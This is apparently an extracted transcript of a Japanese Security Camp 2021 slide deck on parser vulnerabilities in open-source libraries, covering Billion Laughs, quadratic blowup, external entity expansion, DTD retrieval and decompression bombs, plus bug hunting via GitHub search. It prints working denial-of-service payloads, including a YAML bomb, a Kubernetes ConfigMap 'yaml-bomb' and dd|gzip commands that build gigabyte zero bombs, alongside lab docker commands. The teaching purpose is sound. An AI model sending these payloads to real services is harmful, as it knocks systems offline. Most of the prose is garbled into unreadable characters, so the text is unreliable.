ଞͷύʔαͰ΋͍͚ΔͷͰ͸🤔ʁ w #JMMJPO-BVHIT2VBESBUJDCMPXVQFOUJUZFYQBOTJPO͸9.-ϑΝΠϧ͕ ࣋ͭࢀরػೳΛѱ༻͢Δ੬ऑੑ w ଞʹಉ༷ͷػೳ͕͋ΔϑΝΠϧ͕͋Ε͹ಉ͡ςΫ͕࢖͑ͦ͏🤔ʂʁ

#JMMJPO-BVHIT :".-ύʔαʹ΋༗ޮ w #JMMJPO-BVHITΛࢼߦ͢Δ:".-ϑΝΠϧ lol1: &lol1 "lol" lol2: &lol2
[*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1] lol3: &lol3 [*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2] lol4: &lol4 [*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3] lol5: &lol5 [*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4] lol6: &lol6 [*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5] lol7: &lol7 [*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6] lol8: &lol8 [*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7] lol9: &lol9 [*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8] lol10: &lol10 [*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9]

#JMMJPO-BVHIT LTͰͷ࣮ྫ w ,VCFSOFUFT"1*αʔόʢLTJPLVCFSOFUFTQLHBQJTFSWFS ʣʹ ࡉ޻ͨ͠:".-ϑΝΠϧΛૹ৴͢Δͱ#JMMJPO-BVHIT͕ى͜Δ੬ऑੑ w $7&
w IUUQTHJUIVCDPNLVCFSOFUFTLVCFSOFUFTJTTVFT

#JMMJPO-BVHIT LTͰͷ࣮ྫ w IUUQTHJUIVCDPNLVCFSOFUFTLVCFSOFUFTJTTVFTΑΓൈਮ apiVersion: v1 data: a: &a
["web","web","web","web","web","web","web","web","web"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] kind: ConfigMap metadata: name: yaml-bomb namespace: default

2VBESBUJDCMPXVQFOUJUZFYQBOTJPO :".-ύʔαʹ΋༗ޮ w #JMMJPO-BVHITʹࣅͨ2VBESBUJDCMPXVQ΋ಉ͘͡༗ޮ w :".-ύʔαͰͷ2VBESBUJDCMPXVQʹରͯ͠ݴٴ͍ͯ͠Δจݙ͸ ͳ͔ͥݟ͔ͭΒͳ͍🤔 w ਂ͍ೖΕࢠʹͳͬͨΤϯςΟςΟΛېࢭ͢ΔύʔαͷରࡦΛ
͢Γൈ͚ΒΕΔʢ͸ͣʣ w ֤ϥΠϒϥϦͷରࡦͷࠩҟ·ͰௐࠪͰ͖ͯͳ͍͕ɺ 9.-ύʔαͱಉ͘͡#JMMJPO-BVHIT͸ແޮԽ͞Ε͍ͯΔ͚ΕͲɺ 2VBESBUJDCMPXVQ͕༗ޮͳϥΠϒϥϦ΋͋Γͦ͏ʢଟ෼ʣ

2VBESBUJDCMPXVQFOUJUZFYQBOTJPO :".-ύʔαʹ΋༗ޮ w 2VBESBUJDCMPXVQΛࢼߦ͢Δ:".-ϑΝΠϧ w Πϯλʔωοτ্ʹ1P$͕ͳ͍ʢଟ෼ʣͷͰࣗ෼Ͱॻ͖·ͨ͠ʂ lol1: &lol1 “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(লུ)AAAAAAAAAAAAAAAA”
lol2: &lol2 [*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,(লུ),*lol1]

ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ :".-ύʔαͰࢼ͢ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1Z:".-ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ #JMMJPO-BVHITΛࢼߦ͢Δ:".-ϑΝΠϧΛॲཧ͢Δ w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞
$ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/yml-parser $ cd etree $ docker build . -t billion-laughs-etree $ docker run billion-laughs-etree

&YUFSOBMFOUJUZFYQBOTJPO 99&ͷҰछ w Α͘஌ΒΕ͍ͯΔλΠϓͷ99& w ઌ΄Ͳղઆͨ͠΋ͷͱಉ༷ͳͷͰ͜͜Ͱ͸ղઆΛׂѪ

%5%3FUSJFWBM w ͜Ε΋99&ͷҰछ w υΩϡϝϯτλΠϓͷࢦఆΛϩʔΧϧύε΍63-Λ࢖ͬͯߦ͑ΔͨΊ ࢦఆ͞Εͨ৔ॴʹ͋Δ৘ใΛऔಘͰ͖Δ 99&ͷҰछ <?xml version="1.0"
encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head/> <body>text</body> </html>

༗ޮͳ1ZUIPOϥΠϒϥϦ IUUQTQZQJPSHQSPKFDUEFGVTFEYNM &YUFSOBMFOUJUZFYQBOTJPO%5%3FUSJFWBM

&YUFSOBMFOUJUZFYQBOTJPOΛࢼ͢ ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1ZUIPOͷ֤ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ &YUFSOBMFOUJUZFYQBOTJPOΛࢼߦ͢Δ9.-ϑΝΠϧΛॲཧ͢Δ w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞
$ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/xml-parser/external-entity-expansion/ $ cd pulldom/python3.7.0 $ docker build . -t external-entity-expansion-pulldom $ docker run external-entity-expansion-pulldom

%FDPNQSFTTJPO#PNC ѹॖ͞ΕͨϑΝΠϧʹΑΔ%P4 w ల։͢ΔͱڊେͳαΠζʹͳΔѹॖ͞ΕͨϑΝΠϧΛૹΔ͜ͱͰɺ σΟεΫ༰ྔͷѹഭΛૂ͏߈ܸख๏ w ѹॖ͞Εͨ9.-ετϦʔϜΛղੳͰ͖Δ9.-ϥΠϒϥϦ͕ର৅ʹͳΔ w ೔ຊޠͰ͸ߴѹॖϑΝΠϧര஄ɺ;*1ര஄ͱݺ͹Ε͍ͯΔ
$ dd if=/dev/zero bs=1M count=1024 | gzip > zeros.gz # bs*count=1GB $ dd if=/dev/zero bs=1M count=1024 | lzma -z > zeros.xy # bs*count=1GB $ ls -sh zeros.* 1020K zeros.gz #શͯ0ͳͷͰѹॖ཰͕ߴ͍ 148K zeros.xy #શͯ0ͳͷͰѹॖ཰͕ߴ͍

༗ޮͳ1ZUIPOϥΠϒϥϦ IUUQTQZQJPSHQSPKFDUEFGVTFEYNM %FDPNQSFTTJPO#PNC

%FDPNQSFTTJPO#PNCʜ ԋशͳ͠ʜ w ҆શʹԋशΛ΍ͬͯ΋Β͏ͷ͕೉͍͠ͷͰ࢒೦ͳ͕Βԋश͸ͳ͍Ͱ͢ʜ

͜͜·Ͱͷ·ͱΊ w 9.-ʹ͸ଟछଟ༷ͳ߈ܸςΫ͕͋ΔͷͰɺઃఆϑΝΠϧʹ͸+40/ͳͲΛ ࢖͏ํ͕͍͍ w ٯʹ੬ऑੑΛ୳ཱ͢৔͔ΒݟΔͱ9.-ϑΝΠϧΛύʔε͢Δ෦෼͸ૂ͍໨ w 9.-ϥΠϒϥϦຖʹ༗ޮͳ੬ऑੑ͕ҧ͏ͷ͸1ZUIPOʹݶͬͨ͜ͱͰ͸ͳ͍ w ڵຯ͕͋Ε͹ଞͷݴޠͷ΋ͷ΋ௐ΂ͯΈ͍ͯͩ͘͞

ୈ̐ষ (JU)VCΛ࢖ͬͨόάϋϯτํ๏

ϥΠϒϥϦຖͷ੬ऑੑΛ஌ͬͨޙ͸ʜ (JU)VCΛ࢖ͬͨόάϋϯτํ๏ w ಛఆͷϥΠϒϥϦΛ࢖༻͍ͯ͠ΔίʔυΛ͍͔ʹ୳͔͢ w (JU)VCͷػೳΛ׆༻͢Δͱݟ͚ͭΒΕΔ w 5PQJDػೳ w ίʔυݕࡧػೳ
w ίϛοτݕࡧػೳ w JTTVFݕࡧػೳ

Ұ෦ࣗओن੍😢

ԋश੬ऑੑ͕͋Δ044Λ୳͢ʢ͕࣌ؒ͋Ε͹ʣ w ࢒Γ͕࣌ؒ͋Ε͹΍ͬͯ΋Β͏ w ͳ͔ͬͨΒऴΘΔ

IUUQTPXBTQPSHXXXQEGBSDIJWF08"41/;9.-%BOHFSPVTQEG

࠶ܝ੬ऑੑΛൃݟͨ͠ޙ͸ใࠂʂ IUUQTJTFDWVMGPSNJQBHPKQJQBWVMNBJOJOEFYIUNM

஫ҙࣄ߲ w ଟ෼ɺ͋Δఔ౓ελʔ͕͍͍ͭͯΔ(JU)VCϦϙδτϦͰͳ͍ͱରԠͯ͠΋Β ͑ͳ͍

ୈ̑ষ ٕज़ͱ޲͖߹͏࢟੎ͷ࿩

੬ऑੑΛҙࣝͯ͠ΤϯδχΞϦϯάʹऔΓ૊Ή w 9.-ύʔαʹؔ͢Δ੬ऑੑʹৄ͘͠ͳͬͨͷ͸"OESPJE.BOJGFTUYNMΛ ύʔε͢ΔίʔυΛॻ͍ͨͷ͕͖͔͚ͬ w ੩తղੳπʔϧʹࣗ෼͕ॻ͍ͨίʔυΛೖྗͨ͠Β੬ऑੑ͕͋ͬͨ w 1ZUIPOͷ9.-ϥΠϒϥϦ͸σϑΥϧτͰ੬ऑͰͦΕͧΕ༗ޮͳ੬ऑੑ͕ҟͳ Δ͜ͱΛ஌ͬͨ

੬ऑੑΛҙࣝͯ͠ΤϯδχΞϦϯάʹऔΓ૊Ή w ίʔυΛॻ࣌͘ʹࣗ෼͕ॻ͍ͨίʔυʹ੬ऑੑ͕ͳ͍͔֬ೝ͢Δ͜ͱͰ ੬ऑੑΛͳ͘͠ɺηΩϡϦςΟͷ஌ࣝ΋਎ʹͭ͘ w ։ൃͷܦݧΛੵΈͳ͕ΒɺηΩϡϦςΟͷ஌ݟ΋ߴΊΒΕΔ w ͦͯ͠ಘͨ஌ࣝͰόάϋϯτ͢Δͱ$7&ΛऔಘͰ͖ͨΓɺใ঑ۚΛ໯ͬͨΓ Ͱ͖Δ͔΋ʜʂʂʂ

੬ऑੑΛҙࣝͯ͠ΤϯδχΞϦϯάʹऔΓ૊Ή w ηΩϡϦςΟɾΩϟϯϓʹࢀՃ͔ͨ͠Βͱ͍ͬͯશһ͕ηΩϡϦςΟͷಓʹ ਐΉ༁Ͱ͸ͳͯ͘։ൃଆͷಓΛาΜͰ͍͘ਓ΋͍Δ w ηΩϡϦςΟͷ஌ࣝ͸ηΩϡϦςΟΤϯδχΞͱͯ͠΍͍ͬͯ͘ʹ΋ ։ൃଆͷΤϯδχΞͱͯ͠΍͍ͬͯ͘ʹ΋໾ཱͭ w ࠓޙηΩϡϦςΟɾΩϟϯϓͰֶΜͩ஌ࣝͷ͏ͪԿ͔͕໾ཱͯͯ͘ΕΔͱ ͏Ε͍͠Ͱ͢

趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求/seccamp2021-b5

趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求/seccamp2021-b5

More Decks by @tkmru

Other Decks in Programming

Featured

Transcript